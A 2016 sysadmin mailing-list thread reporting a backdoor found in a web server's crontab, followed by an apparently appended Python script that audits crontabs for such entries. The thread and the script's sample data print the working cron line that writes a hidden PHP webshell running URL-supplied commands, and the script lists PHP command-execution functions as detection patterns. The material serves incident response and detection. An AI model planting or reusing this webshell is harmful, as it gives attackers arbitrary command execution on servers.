[Systems] Found a backdoor

Samuel Cantero scanterog at gmail.com
Tue Mar 1 17:50:54 EST 2016


On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <bernie at codewiz.org> wrote:

> On 02/25/2016 04:09 AM, Sebastian Silva wrote:
> > Remember in June we had an incident with a broken Wordpress site.
> > I switched to static generator since then.
> >
> > +1 on containers, just learning more about them and finding them
> > fascinating.
> > Count me in on containerizing everything.
> >
> > I'm not aware of other WordPress sites. Maybe Walter's blog?
> > WordPress is a PIA IMHO.
>
> Yes, WP is riddled with security holes. Back in October, Samuel helped
> Walter upgrade walterbender.org on sunjammer. Samuel, can you confirm
> that the WP instance is now fully patched and locked down?
>

The WP version on the walterbender.org site is 4.3.1. The latest WP version is
4.4.2. I have checked the WP change log and we can find this:

4.4.1 => WordPress versions 4.4 and earlier are affected by a cross-site
scripting vulnerability that could allow a site to be compromised.

4.4.2 => WordPress versions 4.4.1 and earlier are affected by two security
issues: a possible SSRF for certain local URIs, and an open redirection
attack.

This site also uses the 2.5.9 Akismet plugin. The latest version is 3.1.7.
Significant information from the release notes:

   - Pre-emptive security improvements to ensure that the Akismet plugin
   can't be used by attackers to compromise a WordPress installation.
   - Closes a potential XSS vulnerability.

Of course, every version has a lot of bug fixes. We definitely should
upgrade it and test that nothing breaks on the walterbender.org site.

Who is in charge of upgrading the other WP sites?

Regards,

Samuel C.


>
>
> > Regards,
> > Sebastian
> >
> >
> > On 25/02/16 04:47, Bernie Innocenti wrote:
> >> While I was looking for cronjobs in /var/spool/cron/crontabs/, I found
> >> that www-data was executing commands like these:
> >>
> >> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) ==
> >> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
> >> @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
> >>
> >> Did you spot the system()? This executes arbitrary commands specified
> >> via the "localtime" url parameter. Uh-oh.
> >>
> >> There were about a dozen lines like the above, installing .cache.php in
> >> various virtualhosts. I kept a copy of the file in
> >> /root/www-data.backdoor. The file was last written on Jun 23  2015,
> >> which may correlate with the switch to the new website.
> >>
> >> I cleared the mess and searched the logs for requests containing
> >> "localtime", but couldn't find any. I wonder if they could filter the
> >> logs, since they were previously writable by www-data.
> >>
> >> Please watch out. We should ensure directories accessible over http are
> >> not writable by user www-data, especially those in which PHP and CGIs
> >> are enabled.
> >>
> >> Running several large sites under the same uid has always been a bad
> >> security practice, and looking forward we should keep migrating them to
> >> properly isolated containers.
> >>
> >> Finally, WordPress is particularly dangerous and we should update and
> >> harden all instances. Can someone please take care of this? I'll do
> >> MediaWiki, which I know pretty well.
> >>
> >
>
>
> --
>  _ // Bernie Innocenti
>  \X/  http://codewiz.org
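A small crontab audit for the pattern Bernie describes above: a cron entry that keeps rewriting a PHP file whose body calls system() on a request parameter. This is an added example, not code from the thread; the sample crontab is constructed (the backdoor entry, its path and the hash prefix are copied from the quoted message, the other entries are invented), and a real run would feed it the contents of /var/spool/cron/crontabs/www-data.

```python
import re
from dataclasses import dataclass

# Constructed sample crontab for www-data. Entry 2 is the installer from
# the thread; entries 1 and 3 are made-up benign jobs for contrast.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/php /srv/www-example/wp-cron.php
*/27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
30 4 * * 0 tar czf /var/backups/blog.tgz /srv/www-somosazucar/blog
"""

# PHP functions that run OS commands or evaluate code (optionally @-silenced).
DANGEROUS_CALLS = re.compile(
    r"@?\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(", re.I)
USER_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")   # request-controlled data
WRITES_PHP = re.compile(r">>?\s*(\S+\.php\S*)")              # shell redirect into a .php file


@dataclass
class Finding:
    schedule: str
    target: str        # the PHP file the cron job (re)writes
    reasons: list


def parse_crontab(text):
    """Yield (schedule, command) pairs, skipping comments, blanks and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                 # @daily, @reboot, ... shorthand
            parts = line.split(None, 1)
            if len(parts) == 2:
                yield parts[0], parts[1]
            continue
        parts = line.split(None, 5)
        if len(parts) == 6:
            yield " ".join(parts[:5]), parts[5]


def assess_command(cmd):
    """Return (target_php_file_or_None, list_of_reasons) for one cron command."""
    reasons = []
    m = WRITES_PHP.search(cmd)
    target = m.group(1) if m else None
    calls = sorted({c.lower() for c in DANGEROUS_CALLS.findall(cmd)})
    if calls:
        reasons.append("command-execution call(s): " + ", ".join(calls))
    if USER_INPUT.search(cmd):
        reasons.append("reads request parameters")
    if target and target.rsplit("/", 1)[-1].startswith("."):
        reasons.append("hidden dotfile target")
    return target, reasons


def audit_crontab(text):
    """Flag every entry that writes a .php file AND shows at least one backdoor trait."""
    findings = []
    for schedule, cmd in parse_crontab(text):
        target, reasons = assess_command(cmd)
        if target and reasons:
            findings.append(Finding(schedule, target, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{f.schedule}] writes {f.target}: {'; '.join(f.reasons)}")
```

The same check can be pointed at the web roots themselves by running assess_command over the contents of any .php file owned or writable by www-data, which is the "not writable by www-data" rule from the thread turned into a periodic scan.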